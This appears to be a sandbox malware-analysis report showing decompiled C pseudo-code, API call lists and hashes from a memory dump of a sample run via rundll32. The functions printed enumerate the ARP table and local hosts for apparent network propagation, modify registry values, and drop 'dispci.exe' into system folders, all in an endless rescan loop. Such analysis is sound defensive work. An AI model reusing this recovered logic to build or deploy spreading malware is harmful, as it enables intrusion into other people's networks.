                                                                                                                                                  0x0477134f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477128f
                                                                                                                                                  0x04771297
                                                                                                                                                  0x047712f0
                                                                                                                                                  0x04771302
                                                                                                                                                  0x04771315
                                                                                                                                                  0x0477131a
                                                                                                                                                  0x04771334
                                                                                                                                                  0x0477133a
                                                                                                                                                  0x0477133f
                                                                                                                                                  0x0477134a
                                                                                                                                                  0x0477134a
                                                                                                                                                  0x04771356
                                                                                                                                                  0x04771359
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771299
                                                                                                                                                  0x04771299
                                                                                                                                                  0x04771299
                                                                                                                                                  0x0477129e
                                                                                                                                                  0x047712a0
                                                                                                                                                  0x047712a0
                                                                                                                                                  0x047712a6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047712ab
                                                                                                                                                  0x047712c2
                                                                                                                                                  0x047712c2
                                                                                                                                                  0x047712cb
                                                                                                                                                  0x047712cd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047712d3
                                                                                                                                                  0x047712d5
                                                                                                                                                  0x047712d8
                                                                                                                                                  0x047712d8
                                                                                                                                                  0x047712db
                                                                                                                                                  0x047712de
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047712d8
                                                                                                                                                  0x047712ad
                                                                                                                                                  0x047712b5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047712b7
                                                                                                                                                  0x047712ba
                                                                                                                                                  0x047712c0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047712c0
                                                                                                                                                  0x047712c6
                                                                                                                                                  0x047712c8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047712e3
                                                                                                                                                  0x047712e7
                                                                                                                                                  0x047712eb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771299
                                                                                                                                                  0x04771279
                                                                                                                                                  0x0477125e
                                                                                                                                                  0x04771261
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771269
                                                                                                                                                  0x04771270
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 04771204
                                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000800,?,00000000,?,?,?,00000000,?), ref: 0477124F
                                                                                                                                                  • memmove.MSVCRT ref: 04771302
                                                                                                                                                  • memcpy.MSVCRT ref: 04771315
                                                                                                                                                  • RegSetValueExW.KERNELBASE(00000800,00000007,00000000,00000007,?,00000800), ref: 04771334
                                                                                                                                                  • RegFlushKey.ADVAPI32(00000800), ref: 04771344
                                                                                                                                                  • RegCloseKey.KERNELBASE(00000800), ref: 04771359
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Value$CloseFlushOpenQuerymemcpymemmove
                                                                                                                                                  • String ID: cscc
                                                                                                                                                  • API String ID: 3731182797-3289078142
                                                                                                                                                  • Opcode ID: b111e46b977a3101c9b3ff9ff8114300b47eff8af46e54ae0488a9d2a643676b
                                                                                                                                                  • Instruction ID: a8751282045a659e60b51d9a260a68801783604a6b2ac50e4630073dbe42a111
                                                                                                                                                  • Opcode Fuzzy Hash: b111e46b977a3101c9b3ff9ff8114300b47eff8af46e54ae0488a9d2a643676b
                                                                                                                                                  • Instruction Fuzzy Hash: E6418D71A00209EBDF209FA4CD45BEA7BB9FF14744F84C565EA45E6350E731EA84CB90
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                  			E0477742C(intOrPtr _a4) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				long _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				long _v20;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				short _v88;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				void* _t29;
                                                                                                                                                  				void* _t33;
                                                                                                                                                  				void* _t44;
                                                                                                                                                  				signed char* _t46;
                                                                                                                                                  				long _t49;
                                                                                                                                                  				intOrPtr* _t51;
                                                                                                                                                  				void* _t54;
                                                                                                                                                  
                                                                                                                                                  				_t51 = __imp__GetIpNetTable;
                                                                                                                                                  				_t49 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t24 =  *_t51(0,  &_v8, 0); // executed
                                                                                                                                                  				if(_t24 != 0xe8) {
                                                                                                                                                  					if(_t24 != 0x7a) {
                                                                                                                                                  						L15:
                                                                                                                                                  						return _v20;
                                                                                                                                                  					}
                                                                                                                                                  					_t44 = HeapAlloc(GetProcessHeap(), 0, _v8);
                                                                                                                                                  					_v16 = _t44;
                                                                                                                                                  					if(_t44 == 0) {
                                                                                                                                                  						L14:
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					_t29 =  *_t51(_t44,  &_v8, 0); // executed
                                                                                                                                                  					if(_t29 != 0) {
                                                                                                                                                  						L13:
                                                                                                                                                  						HeapFree(GetProcessHeap(), _t49, _t44);
                                                                                                                                                  						goto L14;
                                                                                                                                                  					}
                                                                                                                                                  					_v20 = 1;
                                                                                                                                                  					_v12 = 0;
                                                                                                                                                  					if( *_t44 <= 0) {
                                                                                                                                                  						goto L13;
                                                                                                                                                  					}
                                                                                                                                                  					_v24 = 3;
                                                                                                                                                  					_t46 = _t44 + 0x16;
                                                                                                                                                  					do {
                                                                                                                                                  						_push(4);
                                                                                                                                                  						asm("repe cmpsb");
                                                                                                                                                  						if(0 != 0) {
                                                                                                                                                  							asm("sbb eax, eax");
                                                                                                                                                  							asm("sbb eax, 0xffffffff");
                                                                                                                                                  						}
                                                                                                                                                  						if(0 == 0) {
                                                                                                                                                  							wsprintfW( &_v88, L"%u.%u.%u.%u",  *(_t46 - 2) & 0x000000ff,  *(_t46 - 1) & 0x000000ff,  *_t46 & 0x000000ff, _t46[1] & 0x000000ff);
                                                                                                                                                  							_t54 = _t54 + 0x18;
                                                                                                                                                  							E04776B95( &_v88, 0, _a4);
                                                                                                                                                  						}
                                                                                                                                                  						_v12 = _v12 + 1;
                                                                                                                                                  						_t33 = _v16;
                                                                                                                                                  						_t46 =  &(_t46[0x18]);
                                                                                                                                                  					} while (_v12 <  *_t33);
                                                                                                                                                  					_t44 = _t33;
                                                                                                                                                  					_t49 = 0;
                                                                                                                                                  					goto L13;
                                                                                                                                                  				}
                                                                                                                                                  				return 0;
                                                                                                                                                  			}


















                                                                                                                                                  0x04777433
                                                                                                                                                  0x0477743a
                                                                                                                                                  0x04777442
                                                                                                                                                  0x04777445
                                                                                                                                                  0x04777448
                                                                                                                                                  0x0477744f
                                                                                                                                                  0x0477745b
                                                                                                                                                  0x04777512
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777512
                                                                                                                                                  0x04777473
                                                                                                                                                  0x04777475
                                                                                                                                                  0x0477747a
                                                                                                                                                  0x04777511
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777511
                                                                                                                                                  0x04777486
                                                                                                                                                  0x0477748a
                                                                                                                                                  0x04777502
                                                                                                                                                  0x0477750b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477750b
                                                                                                                                                  0x0477748c
                                                                                                                                                  0x04777493
                                                                                                                                                  0x04777498
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477749a
                                                                                                                                                  0x047774a1
                                                                                                                                                  0x047774a4
                                                                                                                                                  0x047774a4
                                                                                                                                                  0x047774af
                                                                                                                                                  0x047774b1
                                                                                                                                                  0x047774b3
                                                                                                                                                  0x047774b5
                                                                                                                                                  0x047774b5
                                                                                                                                                  0x047774ba
                                                                                                                                                  0x047774d8
                                                                                                                                                  0x047774de
                                                                                                                                                  0x047774e9
                                                                                                                                                  0x047774e9
                                                                                                                                                  0x047774ee
                                                                                                                                                  0x047774f1
                                                                                                                                                  0x047774f7
                                                                                                                                                  0x047774fa
                                                                                                                                                  0x047774fe
                                                                                                                                                  0x04777500
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777500
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04777448
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 04777466
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0477746D
                                                                                                                                                  • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04777486
                                                                                                                                                  • wsprintfW.USER32 ref: 047774D8
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04777504
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0477750B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$ProcessTable$AllocFreewsprintf
                                                                                                                                                  • String ID: %u.%u.%u.%u
                                                                                                                                                  • API String ID: 2259129056-1542503432
                                                                                                                                                  • Opcode ID: 504e13d4c7a38c7fafee125434d51d129c74c48f847db382bf068ac67cdaf10f
                                                                                                                                                  • Instruction ID: 30ed91dfcf4ac15addf75c470d81cf5185ddc053de8455bd1c37929b5eb0f59c
                                                                                                                                                  • Opcode Fuzzy Hash: 504e13d4c7a38c7fafee125434d51d129c74c48f847db382bf068ac67cdaf10f
                                                                                                                                                  • Instruction Fuzzy Hash: E531A5B2900119ABDF118FF9CD849BEBBBCEF89301F544456E901E6241E638AA05DB70
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                  			E04776E66(void* __ecx, struct _CRITICAL_SECTION* _a4, void* _a8, intOrPtr _a12) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* _t46;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				void* _t54;
                                                                                                                                                  				void* _t56;
                                                                                                                                                  				signed int _t57;
                                                                                                                                                  				void* _t72;
                                                                                                                                                  				struct _CRITICAL_SECTION* _t82;
                                                                                                                                                  
                                                                                                                                                  				_t67 = __ecx;
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t82 = _a4;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				if(_t82 == 0 || _a8 == 0) {
                                                                                                                                                  					L11:
                                                                                                                                                  					return _v8;
                                                                                                                                                  				} else {
                                                                                                                                                  					EnterCriticalSection(_t82);
                                                                                                                                                  					_t46 = E04776DA4(0, _t67, _t82, _a8, 0); // executed
                                                                                                                                                  					if(_t46 == 0) {
                                                                                                                                                  						_t68 =  *(_t82 + 0x20);
                                                                                                                                                  						if( *(_t82 + 0x24) >=  *(_t82 + 0x20)) {
                                                                                                                                                  							_t51 = HeapReAlloc(GetProcessHeap(), 8,  *(_t82 + 0x18), 0x3fc +  *(_t82 + 0x20) * 4);
                                                                                                                                                  							if(_t51 != 0) {
                                                                                                                                                  								 *(_t82 + 0x18) = _t51;
                                                                                                                                                  								 *(_t82 + 0x20) =  *(_t82 + 0x20) + 0xff;
                                                                                                                                                  								_v8 = E04776E66(_t68, _t82, _a8, _a12);
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							_t54 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                  							 *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4) = _t54;
                                                                                                                                                  							if(_t54 != 0) {
                                                                                                                                                  								_t56 = HeapAlloc(GetProcessHeap(), 8,  *(_t82 + 0x1c));
                                                                                                                                                  								 *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)) = _t56;
                                                                                                                                                  								_t57 =  *(_t82 + 0x24);
                                                                                                                                                  								_t72 =  *(_t82 + 0x18);
                                                                                                                                                  								if(_t56 == 0) {
                                                                                                                                                  									HeapFree(GetProcessHeap(), 0,  *(_t72 + _t57 * 4));
                                                                                                                                                  								} else {
                                                                                                                                                  									 *((intOrPtr*)( *(_t72 + _t57 * 4) + 4)) = _a12;
                                                                                                                                                  									memcpy( *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)), _a8,  *(_t82 + 0x1c));
                                                                                                                                                  									 *(_t82 + 0x24) =  *(_t82 + 0x24) + 1;
                                                                                                                                                  									_v8 = 1;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					LeaveCriticalSection(_t82);
                                                                                                                                                  					goto L11;
                                                                                                                                                  				}
                                                                                                                                                  			}












                                                                                                                                                  0x04776e66
                                                                                                                                                  0x04776e69
                                                                                                                                                  0x04776e6b
                                                                                                                                                  0x04776e71
                                                                                                                                                  0x04776e76
                                                                                                                                                  0x04776f73
                                                                                                                                                  0x04776f79
                                                                                                                                                  0x04776e85
                                                                                                                                                  0x04776e87
                                                                                                                                                  0x04776e93
                                                                                                                                                  0x04776e9a
                                                                                                                                                  0x04776ea3
                                                                                                                                                  0x04776ea8
                                                                                                                                                  0x04776f48
                                                                                                                                                  0x04776f50
                                                                                                                                                  0x04776f55
                                                                                                                                                  0x04776f5b
                                                                                                                                                  0x04776f68
                                                                                                                                                  0x04776f68
                                                                                                                                                  0x04776eae
                                                                                                                                                  0x04776ec1
                                                                                                                                                  0x04776ec9
                                                                                                                                                  0x04776ece
                                                                                                                                                  0x04776edc
                                                                                                                                                  0x04776ee7
                                                                                                                                                  0x04776eeb
                                                                                                                                                  0x04776eee
                                                                                                                                                  0x04776ef1
                                                                                                                                                  0x04776f29
                                                                                                                                                  0x04776ef3
                                                                                                                                                  0x04776ef9
                                                                                                                                                  0x04776f0d
                                                                                                                                                  0x04776f15
                                                                                                                                                  0x04776f18
                                                                                                                                                  0x04776f18
                                                                                                                                                  0x04776ef1
                                                                                                                                                  0x04776ece
                                                                                                                                                  0x04776ea8
                                                                                                                                                  0x04776f6c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776f72

                                                                                                                                                  APIs
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,74CB5520,74CB4F20,?,?,04776A84,?,?,?), ref: 04776E87
                                                                                                                                                    • Part of subcall function 04776DA4: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04776E98,?,00000000,?,?,04776A84,?,?), ref: 04776DB5
                                                                                                                                                    • Part of subcall function 04776DA4: LeaveCriticalSection.KERNEL32(?,?,?,04776E98,?,00000000,?,?,04776A84,?,?), ref: 04776E0C
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008,?,00000000,?,?,04776A84,?,?,?), ref: 04776EB8
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,04776A84,?,?,?), ref: 04776EC1
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,04776A84,?,?,?), ref: 04776ED9
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,04776A84,?,?,?), ref: 04776EDC
                                                                                                                                                  • memcpy.MSVCRT ref: 04776F0D
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,04776A84,?,?,?), ref: 04776F26
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,04776A84,?,?,?), ref: 04776F29
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,?,04776A84,?,?,?), ref: 04776F41
                                                                                                                                                  • HeapReAlloc.KERNEL32(00000000,?,?,04776A84,?,?,?), ref: 04776F48
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,04776A84,?,?,?), ref: 04776F6C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$CriticalProcessSection$Alloc$EnterLeave$Freememcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1369668251-0
                                                                                                                                                  • Opcode ID: 2524483005b6e4e02b1db8126aecb89d93882496d14f7bd6d3149ca68f2c647a
                                                                                                                                                  • Instruction ID: 3da7831c5da50ec7aa6d8c1ece8ccd024e7adf5a25aad0000b746b110bd17fe7
                                                                                                                                                  • Opcode Fuzzy Hash: 2524483005b6e4e02b1db8126aecb89d93882496d14f7bd6d3149ca68f2c647a
                                                                                                                                                  • Instruction Fuzzy Hash: 31316671600A04AFDB219FAAC944DAAB7FAFF88314F408918F94687651DB31F912CF50
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                  			E047710A7() {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				short _v532;
                                                                                                                                                  				short _v1052;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				signed int _t37;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				signed int _t41;
                                                                                                                                                  				void* _t42;
                                                                                                                                                  				void* _t43;
                                                                                                                                                  				void* _t49;
                                                                                                                                                  				intOrPtr* _t55;
                                                                                                                                                  				void* _t58;
                                                                                                                                                  				intOrPtr* _t59;
                                                                                                                                                  				signed char _t62;
                                                                                                                                                  				signed int _t64;
                                                                                                                                                  				signed int _t65;
                                                                                                                                                  				signed int _t66;
                                                                                                                                                  				intOrPtr _t67;
                                                                                                                                                  				intOrPtr _t69;
                                                                                                                                                  				short _t70;
                                                                                                                                                  				void* _t71;
                                                                                                                                                  				void* _t72;
                                                                                                                                                  				short _t73;
                                                                                                                                                  				void* _t75;
                                                                                                                                                  
                                                                                                                                                  				_t62 = 2;
                                                                                                                                                  				_t73 = 0;
                                                                                                                                                  				if(( *0x4787bc0 & _t62) == 0) {
                                                                                                                                                  					L20:
                                                                                                                                                  					return _t73;
                                                                                                                                                  				}
                                                                                                                                                  				if(( *0x4787b7c & 0x00000040) != 0) {
                                                                                                                                                  					_t37 = 0;
                                                                                                                                                  					__eflags = 0;
                                                                                                                                                  					do {
                                                                                                                                                  						_t17 = _t37 + L"C:\\Windows\\"; // 0x3a0043
                                                                                                                                                  						_t64 =  *_t17 & 0x0000ffff;
                                                                                                                                                  						 *(_t75 + _t37 - 0x210) = _t64;
                                                                                                                                                  						_t37 = _t37 + _t62;
                                                                                                                                                  						__eflags = _t64;
                                                                                                                                                  					} while (_t64 != 0);
                                                                                                                                                  				} else {
                                                                                                                                                  					ExpandEnvironmentStringsW(L"%ALLUSERSPROFILE%",  &_v532, 0x104);
                                                                                                                                                  					_t55 =  &_v532;
                                                                                                                                                  					_t71 = _t55 + 2;
                                                                                                                                                  					do {
                                                                                                                                                  						_t67 =  *_t55;
                                                                                                                                                  						_t55 = _t55 + _t62;
                                                                                                                                                  					} while (_t67 != 0);
                                                                                                                                                  					_t58 = (_t55 - _t71 >> 1) + (_t55 - _t71 >> 1);
                                                                                                                                                  					if( *((short*)(_t75 + _t58 - 0x212)) == 0x5c) {
                                                                                                                                                  						L10:
                                                                                                                                                  						_t38 = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							_t65 =  *(_t75 + _t38 - 0x210) & 0x0000ffff;
                                                                                                                                                  							 *(_t75 + _t38 - 0x418) = _t65;
                                                                                                                                                  							_t38 = _t38 + _t62;
                                                                                                                                                  						} while (_t65 != 0);
                                                                                                                                                  						_push( &_v12);
                                                                                                                                                  						_push( &_v8);
                                                                                                                                                  						_t41 = 9; // executed
                                                                                                                                                  						_t42 = E04778313(_t41); // executed
                                                                                                                                                  						if(_t42 == 0) {
                                                                                                                                                  							goto L20;
                                                                                                                                                  						}
                                                                                                                                                  						_t43 = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							_t66 =  *(_t75 + _t43 - 0x210) & 0x0000ffff;
                                                                                                                                                  							 *(_t75 + _t43 - 0x418) = _t66;
                                                                                                                                                  							_t43 = _t43 + _t62;
                                                                                                                                                  						} while (_t66 != 0);
                                                                                                                                                  						if(PathAppendW( &_v1052, L"dispci.exe") != 0) {
                                                                                                                                                  							_t49 = E047787E7(_v12,  &_v1052, _v8); // executed
                                                                                                                                                  							_t88 = _t49;
                                                                                                                                                  							if(_t49 != 0) {
                                                                                                                                                  								E04771000(_t88,  &_v532); // executed
                                                                                                                                                  								if(E04771531() == 0) {
                                                                                                                                                  									_t73 = 1;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						RtlFreeHeap(GetProcessHeap(), 0, _v8); // executed
                                                                                                                                                  						goto L20;
                                                                                                                                                  					}
                                                                                                                                                  					 *((short*)(_t75 + _t58 - 0x20e)) = 0;
                                                                                                                                                  					_t59 =  &_v532;
                                                                                                                                                  					_t72 = _t59 + 2;
                                                                                                                                                  					do {
                                                                                                                                                  						_t69 =  *_t59;
                                                                                                                                                  						_t59 = _t59 + _t62;
                                                                                                                                                  					} while (_t69 != 0);
                                                                                                                                                  					_t70 = 0x5c;
                                                                                                                                                  					 *((short*)(_t75 + (_t59 - _t72 >> 1) * 2 - 0x210)) = _t70;
                                                                                                                                                  				}
                                                                                                                                                  			}




























                                                                                                                                                  0x047710b4
                                                                                                                                                  0x047710b5
                                                                                                                                                  0x047710bd
                                                                                                                                                  0x047711e9
                                                                                                                                                  0x047711ee
                                                                                                                                                  0x047711ee
                                                                                                                                                  0x047710ca
                                                                                                                                                  0x04771135
                                                                                                                                                  0x04771135
                                                                                                                                                  0x04771137
                                                                                                                                                  0x04771137
                                                                                                                                                  0x04771137
                                                                                                                                                  0x0477113e
                                                                                                                                                  0x04771146
                                                                                                                                                  0x04771148
                                                                                                                                                  0x04771148
                                                                                                                                                  0x047710cc
                                                                                                                                                  0x047710dd
                                                                                                                                                  0x047710e3
                                                                                                                                                  0x047710e9
                                                                                                                                                  0x047710ec
                                                                                                                                                  0x047710ec
                                                                                                                                                  0x047710ef
                                                                                                                                                  0x047710f1
                                                                                                                                                  0x047710fa
                                                                                                                                                  0x04771105
                                                                                                                                                  0x0477114d
                                                                                                                                                  0x0477114d
                                                                                                                                                  0x0477114f
                                                                                                                                                  0x0477114f
                                                                                                                                                  0x04771157
                                                                                                                                                  0x0477115f
                                                                                                                                                  0x04771161
                                                                                                                                                  0x04771169
                                                                                                                                                  0x0477116d
                                                                                                                                                  0x04771170
                                                                                                                                                  0x04771171
                                                                                                                                                  0x04771178
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477117a
                                                                                                                                                  0x0477117c
                                                                                                                                                  0x0477117c
                                                                                                                                                  0x04771184
                                                                                                                                                  0x0477118c
                                                                                                                                                  0x0477118e
                                                                                                                                                  0x047711a7
                                                                                                                                                  0x047711b6
                                                                                                                                                  0x047711bb
                                                                                                                                                  0x047711bd
                                                                                                                                                  0x047711c6
                                                                                                                                                  0x047711d2
                                                                                                                                                  0x047711d6
                                                                                                                                                  0x047711d6
                                                                                                                                                  0x047711d2
                                                                                                                                                  0x047711bd
                                                                                                                                                  0x047711e3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047711e3
                                                                                                                                                  0x04771109
                                                                                                                                                  0x04771111
                                                                                                                                                  0x04771117
                                                                                                                                                  0x0477111a
                                                                                                                                                  0x0477111a
                                                                                                                                                  0x0477111d
                                                                                                                                                  0x0477111f
                                                                                                                                                  0x0477112a
                                                                                                                                                  0x0477112b
                                                                                                                                                  0x0477112b

                                                                                                                                                  APIs
                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000104), ref: 047710DD
                                                                                                                                                  • PathAppendW.SHLWAPI(?,dispci.exe,?,?), ref: 0477119F
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 047711DC
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000), ref: 047711E3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AppendEnvironmentExpandFreePathProcessStrings
                                                                                                                                                  • String ID: %ALLUSERSPROFILE%$\$dispci.exe
                                                                                                                                                  • API String ID: 1077166327-497635308
                                                                                                                                                  • Opcode ID: 246fb3700e08b68b5a5028dbb32fa25955288dc16e2448cca76cc6ff231368ab
                                                                                                                                                  • Instruction ID: 88d44e67291f71ab87387878a026750f5755b07a18ca21ecd039b5ce1d1c7843
                                                                                                                                                  • Opcode Fuzzy Hash: 246fb3700e08b68b5a5028dbb32fa25955288dc16e2448cca76cc6ff231368ab
                                                                                                                                                  • Instruction Fuzzy Hash: 2231B83154020E96DF10AFE89C89BE977B8FF04794F944879E945C7341F774AA848B50
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                  			E047777D1() {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				char _v528;
                                                                                                                                                  				char* _t12;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  
                                                                                                                                                  				_t21 =  *0x4787bb8;
                                                                                                                                                  				E04776B95(L"127.0.0.1", 1);
                                                                                                                                                  				E04776B95(L"localhost", 1, _t21); // executed
                                                                                                                                                  				E04776B95(L"0.0.0.0", 1, _t21);
                                                                                                                                                  				_t12 =  &_v528;
                                                                                                                                                  				_v8 = 0x104;
                                                                                                                                                  				__imp__GetComputerNameExW(4, _t12,  &_v8);
                                                                                                                                                  				if(_t12 != 0) {
                                                                                                                                                  					E04776B95( &_v528, 1, _t21);
                                                                                                                                                  				}
                                                                                                                                                  				_t13 = CreateThread(0, 0, E04778B2E, _t21, 0, 0); // executed
                                                                                                                                                  				if(_t13 != 0) {
                                                                                                                                                  					FindCloseChangeNotification(_t13); // executed
                                                                                                                                                  				}
                                                                                                                                                  				_t24 = 0;
                                                                                                                                                  				L5:
                                                                                                                                                  				E0477733C(_t21); // executed
                                                                                                                                                  				E0477742C(_t21); // executed
                                                                                                                                                  				if(_t24 == 0) {
                                                                                                                                                  					E0477751B(_t21, 0x80000000, 0); // executed
                                                                                                                                                  					_t24 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				Sleep(0x2bf20);
                                                                                                                                                  				goto L5;
                                                                                                                                                  			}









                                                                                                                                                  0x047777dd
                                                                                                                                                  0x047777ec
                                                                                                                                                  0x047777f7
                                                                                                                                                  0x04777802
                                                                                                                                                  0x0477780b
                                                                                                                                                  0x04777814
                                                                                                                                                  0x0477781b
